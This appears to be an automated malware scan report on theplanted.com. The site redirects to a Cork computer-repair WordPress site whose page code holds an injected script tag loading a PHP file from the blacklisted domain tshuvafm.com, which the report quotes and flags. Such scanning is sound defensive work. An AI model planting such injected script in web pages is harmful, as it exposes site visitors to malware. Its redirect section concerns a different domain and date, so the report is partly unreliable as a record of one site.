Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=theplanted.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lpfworks.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 10:32:29 GMT
Location: http://www.lpfworks.com/
Server: Apache
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
...232 bytes of data.
GET / HTTP/1.1
Host: lpfworks.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 10:32:29 GMT
Location: http://www.lpfworks.com/
Server: Apache
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
...232 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lpfworks.com
Referer: http://www.google.com/search?q=lpfworks.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lpfworks.com
Referer: http://www.google.com/search?q=lpfworks.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://theplanted.com/ | HTTP/1.1 302 Redirect Date: Thu, 24 Apr 2014 19:45:10 GMT Location: http://www.corkcomputers.ie/ Server: Microsoft-IIS/6.0 Content-Length: 151 Content-Type: text/html X-Powered-By: ASP.NET | malicious |
http://www.corkcomputers.ie/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=3600 Connection: close Date: Thu, 24 Apr 2014 19:45:09 GMT Location: http://corkcomputers.ie/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 24 Apr 2014 20:45:09 GMT X-Pingback: http://corkcomputers.ie/xmlrpc.php | clean |
http://corkcomputers.ie/ | 200 OK Content-Length: 133297 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tshuvafm.com ...[12221 bytes skipped]... t;meta property="og:title" content="Computer repairs, Laptops repairs Cork, Apple Repairs Cork 0214355168" /> <meta property="og:description" content="Cork Computers repair Computers, Laptops, Apple mac book, iMac, iPad, and laptop screens in Cork. Virus, Malware removal Cork. We are in business 9 years." /> <meta property="og:url" content="http://corkcomputers.ie" /> <script type="text/javascript" src="http://tshuvafm.com/logs/FGKdqhbf.php<script type="text/javascript"><!-- document.writeln('<'+'scr'+'ipt type="text/javascript" src="http://home.hit.stat24.com/_'+(new Date()).getTime()+'/script.js?id=bQ2VhAMxrTWt8zZ_kV1mVXXoj51ZFMM64T5Takdk1mP.H7"></'+'scr'+'ipt>'); //--></script>?id=15921591"></script> <!--[if lte IE 8]> <script type="text/javascript"> jQuery(document).ready(function() { var imgs, i, w; var imgs ...[134974 bytes skipped]... | ||
http://corkcomputers.ie/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/x-javascript | clean |
http://corkcomputers.ie/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7199 Content-Type: application/x-javascript | clean |
http://corkcomputers.ie/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.plugins.min.js?rev=4.2.4&ver=3.8.3 | 200 OK Content-Length: 85185 Content-Type: application/x-javascript | clean |
http://corkcomputers.ie/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.2.4&ver=3.8.3 | 200 OK Content-Length: 90961 Content-Type: application/x-javascript | clean |
http://corkcomputers.ie/wp-content/themes/Avada/framework/plugins/LayerSlider//static/js/layerslider.kreaturamedia.jquery.js?ver=5.1.1 | 200 OK Content-Length: 57000 Content-Type: application/x-javascript | clean |
http://corkcomputers.ie/wp-content/themes/Avada/framework/plugins/LayerSlider//static/js/greensock.js?ver=1.11.2 | 200 OK Content-Length: 52295 Content-Type: application/x-javascript | clean |
http://corkcomputers.ie/wp-content/themes/Avada/framework/plugins/LayerSlider//static/js/layerslider.transitions.js?ver=5.1.1 | 200 OK Content-Length: 21095 Content-Type: application/x-javascript | clean |
http://corkcomputers.ie/wp-includes/js/comment-reply.min.js?ver=3.8.3 | 200 OK Content-Length: 757 Content-Type: application/x-javascript | clean |
http://tshuvafm.com/logs/FGKdqhbf.php<script type= | 404 Componente no encontrado Content-Length: 1430 Content-Type: text/html | clean |
http://tshuvafm.com/index.php | 200 OK Content-Length: 28924 Content-Type: text/html | clean |
http://tshuvafm.com/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://tshuvafm.com/templates/jsn_epic_pro/js/jsn_script.js | 200 OK Content-Length: 3153 Content-Type: application/javascript | clean |
http://tshuvafm.com/ | 200 OK Content-Length: 28903 Content-Type: text/html | clean |
http://tshuvafm.com/component/user/reset | 200 OK Content-Length: 7911 Content-Type: text/html | clean |